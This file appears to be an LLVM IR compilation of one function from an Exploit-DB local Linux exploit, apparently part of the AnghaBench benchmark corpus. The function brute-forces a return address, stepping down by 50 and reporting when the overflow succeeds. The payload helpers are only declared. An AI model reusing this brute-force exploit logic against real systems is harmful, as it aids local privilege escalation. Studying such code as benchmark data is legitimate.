; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_23738.c_bruteforce.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_23738.c_bruteforce.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@stdout = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [30 x i8] c"[+] Starting bruteforcing...\0A\00", align 1
@.str.1 = private unnamed_addr constant [21 x i8] c"[+] Testing 0x%x...\0A\00", align 1
@.str.2 = private unnamed_addr constant [29 x i8] c"[+] Ret address found: 0x%x\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @bruteforce(i64 %0) #0 {
  %2 = alloca i64, align 8
  %3 = alloca i32, align 4
  %4 = alloca i64, align 8
  store i64 %0, i64* %2, align 8
  %5 = load i32, i32* @stdout, align 4
  %6 = call i32 (i32, i8*, ...) @fprintf(i32 %5, i8* getelementptr inbounds ([30 x i8], [30 x i8]* @.str, i64 0, i64 0))
  %7 = load i64, i64* %2, align 8
  store i64 %7, i64* %4, align 8
  br label %8

8:                                                ; preds = %25, %1
  %9 = load i64, i64* %4, align 8
  %10 = icmp slt i64 %9, 0
  br i1 %10, label %11, label %28

11:                                               ; preds = %8
  %12 = load i32, i32* @stdout, align 4
  %13 = load i64, i64* %4, align 8
  %14 = call i32 (i32, i8*, ...) @fprintf(i32 %12, i8* getelementptr inbounds ([21 x i8], [21 x i8]* @.str.1, i64 0, i64 0), i64 %13)
  %15 = load i64, i64* %4, align 8
  %16 = call i32 @make_string(i64 %15)
  %17 = call i32 (...) @tease()
  store i32 %17, i32* %3, align 4
  %18 = load i32, i32* %3, align 4
  %19 = icmp eq i32 %18, 0
  br i1 %19, label %20, label %24

20:                                               ; preds = %11
  %21 = load i32, i32* @stdout, align 4
  %22 = load i64, i64* %4, align 8
  %23 = call i32 (i32, i8*, ...) @fprintf(i32 %21, i8* getelementptr inbounds ([29 x i8], [29 x i8]* @.str.2, i64 0, i64 0), i64 %22)
  br label %28

24:                                               ; preds = %11
  br label %25

25:                                               ; preds = %24
  %26 = load i64, i64* %4, align 8
  %27 = sub nsw i64 %26, 50
  store i64 %27, i64* %4, align 8
  br label %8

28:                                               ; preds = %20, %8
  ret i32 0
}

declare dso_local i32 @fprintf(i32, i8*, ...) #1

declare dso_local i32 @make_string(i64) #1

declare dso_local i32 @tease(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
